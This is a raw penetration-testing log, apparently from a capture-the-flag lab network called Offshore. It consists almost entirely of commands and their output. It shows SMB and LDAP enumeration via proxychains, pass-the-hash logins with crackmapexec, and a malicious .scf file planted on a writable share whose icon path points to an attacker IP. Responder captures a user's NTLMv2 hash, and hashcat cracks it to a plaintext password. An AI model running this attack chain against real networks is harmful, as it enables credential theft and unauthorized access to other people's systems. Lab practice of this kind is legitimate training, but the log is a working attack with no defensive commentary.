└─$ proxychains -f proxychains4.conf crackmapexec smb 172.16.4.0/24 2>/dev/null
SMB 172.16.4.31 445 MS02 [*] Windows Server 2016 Standard 14393 x64 (name:MS02) (domain:CLIENT.OFFSHORE.COM) (signing:False) (SMBv1:True)
SMB 172.16.4.5 445 DC04 [*] Windows Server 2016 Standard 14393 x64 (name:DC04) (domain:CLIENT.OFFSHORE.COM) (signing:True) (SMBv1:True)
PS C:\Users\Administrator\Desktop> Get-ADUser -Filter * -Server ms02.client.offshore.com -Properties * | select samaccountname, serviceprincipalnames
samaccountname serviceprincipalnames
-------------- ---------------------
Administrator {}
Guest {}
DefaultAccount {}
krbtgt {kadmin/changepw}
offshore_adm {}
client_banking {}
ADMIN$ {}
bankvault {}
svc_clientsupport {}
client_adm {}
ben {}
└─$ proxychains -f proxychains4.conf crackmapexec ldap 172.16.4.5 -u 'bankvault' -H aad3b435b51404eeaad3b435b51404ee:0ce1cb01ade331cdba32d0e1fba338a1 --users -d admin.offshore.com 2>/dev/null
SMB 172.16.4.5 445 DC04 [*] Windows Server 2016 Standard 14393 x64 (name:DC04) (domain:admin.offshore.com) (signing:True) (SMBv1:True)
LDAP 172.16.4.5 389 DC04 [+] admin.offshore.com\bankvault:0ce1cb01ade331cdba32d0e1fba338a1
LDAP 172.16.4.5 389 DC04 [*] Total of records returned 13
LDAP 172.16.4.5 389 DC04 Administrator Built-in account for administering the computer/domain
LDAP 172.16.4.5 389 DC04 Guest Built-in account for guest access to the computer/domain
LDAP 172.16.4.5 389 DC04 DefaultAccount A user account managed by the system.
LDAP 172.16.4.5 389 DC04 krbtgt Key Distribution Center Service Account
LDAP 172.16.4.5 389 DC04 offshore_adm Banking share is opened upon login to process automatic transfers.
LDAP 172.16.4.5 389 DC04 client_banking **Old admin account for client banking app** OFFSHORE{h1dd3n_1n_pl@iN_$1ght}
LDAP 172.16.4.5 389 DC04 bankvault
LDAP 172.16.4.5 389 DC04 svc_clientsupport
LDAP 172.16.4.5 389 DC04 client_adm
LDAP 172.16.4.5 389 DC04
└─$ proxychains -f proxychains4.conf crackmapexec smb 172.16.4.5 -u 'bankvault' -H aad3b435b51404eeaad3b435b51404ee:0ce1cb01ade331cdba32d0e1fba338a1 --shares -d admin.offshore.com 2>/dev/null
SMB 172.16.4.5 445 DC04 [*] Windows Server 2016 Standard 14393 x64 (name:DC04) (domain:admin.offshore.com) (signing:True) (SMBv1:True)
SMB 172.16.4.5 445 DC04 [+] admin.offshore.com\bankvault:0ce1cb01ade331cdba32d0e1fba338a1
SMB 172.16.4.5 445 DC04 [+] Enumerated shares
SMB 172.16.4.5 445 DC04 Share Permissions Remark
SMB 172.16.4.5 445 DC04 ----- ----------- ------
SMB 172.16.4.5 445 DC04 ADMIN$ Remote Admin
SMB 172.16.4.5 445 DC04 C$ Default share
SMB 172.16.4.5 445 DC04 IPC$ Remote IPC
SMB 172.16.4.5 445 DC04 NETLOGON READ Logon server share
SMB 172.16.4.5 445 DC04 SYSVOL READ Logon server share
┌──(jay㉿jsec)-[~/Documents/offshore/DC04]
└─$ proxychains -f proxychains4.conf crackmapexec smb 172.16.4.31 -u 'bankvault' -H aad3b435b51404eeaad3b435b51404ee:0ce1cb01ade331cdba32d0e1fba338a1 --shares -d admin.offshore.com 2>/dev/null
SMB 172.16.4.31 445 MS02 [*] Windows Server 2016 Standard 14393 x64 (name:MS02) (domain:admin.offshore.com) (signing:False) (SMBv1:True)
SMB 172.16.4.31 445 MS02 [+] admin.offshore.com\bankvault:0ce1cb01ade331cdba32d0e1fba338a1
SMB 172.16.4.31 445 MS02 [+] Enumerated shares
SMB 172.16.4.31 445 MS02 Share Permissions Remark
SMB 172.16.4.31 445 MS02 ----- ----------- ------
SMB 172.16.4.31 445 MS02 ADMIN$ Remote Admin
SMB 172.16.4.31 445 MS02 Banking_Data READ,WRITE
SMB 172.16.4.31 445 MS02 C$ Default share
SMB 172.16.4.31 445 MS02 IPC$ Remote IPC
sudo responder -I tun0
proxychains -f proxychains4.conf ./smbclient.py admin.offshore.com/bankvault@172.16.4.31 -hashes aad3b435b51404eeaad3b435b51404ee:0ce1cb01ade331cdba32d0e1fba338a1
use Banking_Data
put @sifo.scf
# cat @sido.scf
[-] SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.)
# cat @sifo.scf
[Shell]
Command=2
Iconfile=\\10.10.15.149\sifo\doesntmatter
[Taskbar]
Command=ToggleDesktop
[SMB] NTLMv2-SSP Client : 10.10.110.3
[SMB] NTLMv2-SSP Username : CLIENT\offshore_adm
[SMB] NTLMv2-SSP Hash : offshore_adm::CLIENT:86c8c88b1fabe9ac:92AD16189CE6CCDF3AA176E1FDFFBAE5:010100000000000080E6A9E06384D901FA9905AA6E8674020000000002000800410038005400450001001E00570049004E002D0045005200380050003600470044004F0041004600410004003400570049004E002D0045005200380050003600470044004F004100460041002E0041003800540045002E004C004F00430041004C000300140041003800540045002E004C004F00430041004C000500140041003800540045002E004C004F00430041004C000700080080E6A9E06384D901060004000200000008003000300000000000000000000000002000006EC0220684D30FCA0A058D16505EF37698D11DB0037318FBDC31CC627383A1100A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310035002E003100340039000000000000000000
└─$ hashcat -m 5600 offshore_adm /usr/share/wordlists/rockyou.txt --show
OFFSHORE_ADM::CLIENT:86c8c88b1fabe9ac:92ad16189ce6ccdf3aa176e1fdffbae5:010100000000000080e6a9e06384d901fa9905aa6e8674020000000002000800410038005400450001001e00570049004e002d0045005200380050003600470044004f0041004600410004003400570049004e002d0045005200380050003600470044004f004100460041002e0041003800540045002e004c004f00430041004c000300140041003800540045002e004c004f00430041004c000500140041003800540045002e004c004f00430041004c000700080080e6a9e06384d901060004000200000008003000300000000000000000000000002000006ec0220684d30fca0a058d16505ef37698d11db0037318fbdc31cc627383a1100a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310035002e003100340039000000000000000000:Banker!123